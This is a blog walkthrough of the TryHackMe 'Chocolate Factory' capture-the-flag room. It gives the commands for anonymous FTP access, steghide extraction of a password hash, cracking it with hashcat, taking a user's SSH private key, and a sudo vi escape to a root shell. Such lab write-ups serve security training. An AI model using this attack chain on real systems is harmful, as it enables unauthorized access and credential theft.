christopher di-nozzi

---

TryHackMe Walkthrough - Chocolate Factory

Oompa Loompa Doompety Doo! I've got a perfect room for you!

18/01/2021

Another day, another box! I just hope it's not as weird as the Charlie and the Chocolate Factory movie was...

Room by 0x9747 and saharshtapi and AndyInfoSec. Check it out here!

Enumeration

We start with an NMAP scan of the system. As always, I threw on a full port scan and service enumeration running:

nmap -sV -p- IP

I got a lot of results from doing this, a lot of open services.

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
100/tcp open newacct?
101/tcp open hostname?
102/tcp open iso-tsap?
103/tcp open gppitnp?
104/tcp open acr-nema?
105/tcp open csnet-ns?
106/tcp open pop3pw?
107/tcp open rtelnet?
108/tcp open snagas?
109/tcp open pop2?
110/tcp open pop3?
111/tcp open rpcbind?
112/tcp open mcidas?
113/tcp open ident?
114/tcp open audionews?
115/tcp open sftp?
116/tcp open ansanotify?
117/tcp open uucp-path?
118/tcp open sqlserv?
119/tcp open nntp?
120/tcp open tcpwrapped
121/tcp open tcpwrapped
122/tcp open tcpwrapped
123/tcp open tcpwrapped
124/tcp open tcpwrapped
125/tcp open tcpwrapped

Let's start simple, with port 80! Visiting the IP in my browser took me to the squirrel room! It's asking for some login credentials which I don't have :( Time for some more enumeration! I ran a dirb scan and a nikto scan on the webserver as well, just in case there was anything we were missing. While that's running, lets check out that FTP port!

FTP

I ran this command to open an FTP session:

ftp IP

Replace IP with your machines IP. Then I used username anonymous and password anonymous to get access! The oldest FTP trick in the book! When I got in, I looked for files by running "ls" and there was "gum_room.jpg". I ran:

get gum\_room.jpg

This downloaded the file onto my machine. It looks like a pretty normal file, but maybe its hiding something? We can use steghide to check! I ran the command:

steghide extract -sf gum\_room.jpg

Would you look at that! A file was hidden inside called "b64.txt". If we look at the contents of it, it looks like base 64. I put it into CyberChef to decode it from base 64. It looks like the contents of a /etc/shadow file and has the password hash for the user charlie! Lets crack it!

Cracking Charlies Hash / Answer 2

I moved the hash into its own file called "charlie.hash". I then used hashcat and the rockyou.txt wordlist to try and crack it.

hashcat -a 0 -m 1800 charlie.hash /usr/share/wordlists/rockyou.txt

After a little bit of time I got out password! I tried this for SSH login but it didn't work... maybe on the website? And we're in! I could successfully login to the website using the username "charlie" and the password we just cracked!

Website / Answer 1

We seem to be able to execute commands on the server via the input box. We can look at the files in our directory by running "ls". There was one that stood out: key_rev_key. Running "cat key_rev_key" shows us that it's some sort of compiled executable! By looking at the page source we can see it more clearly! We can look at the stings in the executable by running:

strings key\_rev\_key

Theres a big giveaway with "congratulations you have found the key:". Right after there is our key and the answer to question 1! Maybe this will come in handy later...

Charlie Access / Answer 4

Let's see if we can get access to the Charlie user! We can look at his files by running:

ls /home/charlie

There's the user flag! But we don't have permission to open it! There's two other files: teleport and teleport.pub. Could be a set of SSH keys? We can take a look at one of them by running:

cat /home/charlie/teleport

Looks like an SSH private key to me! Lets copy that onto our system! I saved it as "teleport" to keep things simple. We need to make sure we set the permissions correctly on this key otherwise the server won't like it. Run this command:

chmod 700 teleport

This way only the owner (which is us!) can access it and the server will stay happy! Now we just run:

ssh -i teleport charlie@IP

We're in! :D Now we can get that user flag by navigating home and opening it up!

cd /home/charlie cat user.txt

One flag down... one to go...

Root / Answer 5

Let's check what programs we can run as sudo by running:

sudo -l

It looks like we can run "vi" as sudo! Perfect! I looked up vi in GTFOBins and found a nice way to get us root access! We just have to run:

sudo vi -c ':!/bin/sh' /dev/null

We're in! We can change directory into root and see if that flags there!

cd /root
ls

No flag :( But there is "root.py"! Let's open it up!

cat root.py

from cryptography.fernet import Fernet
import pyfiglet
key=input("Enter the key: ")
f=Fernet(key)
encrypted\_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9\_H\_yQikhR-bPy09-NVQn8lF\_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO\_xbIQkQojwf\_unpPAAKyJQDHNvQaJ'
dcrypt\_mess=f.decrypt(encrypted\_mess)
mess=dcrypt\_mess.decode()
display1=pyfiglet.figlet\_format("You Are Now The Owner Of ")
display2=pyfiglet.figlet\_format("Chocolate Factory ")
print(display1)
print(display2)
print(mess)

Looks like we have an encrpyted string and need a key to crack it! When trying to run the python script I ran into some issues so lets use this website instead. We can put the contents of the "encrypted_mess" variable into the "token" field, now we just need a key! Let's try our key from answer 1! Make sure to only include the section from "-" to "="! There's our key! Done!

Conclusion

I had a lot of fun doing this room! I was a bit confused by the ordering of the questions, finding the answer to question 2 before question 1 but other than that it was quite straight forward! It's a bit harder than some of the other "easy" boxes on TryHackMe but not too complicated!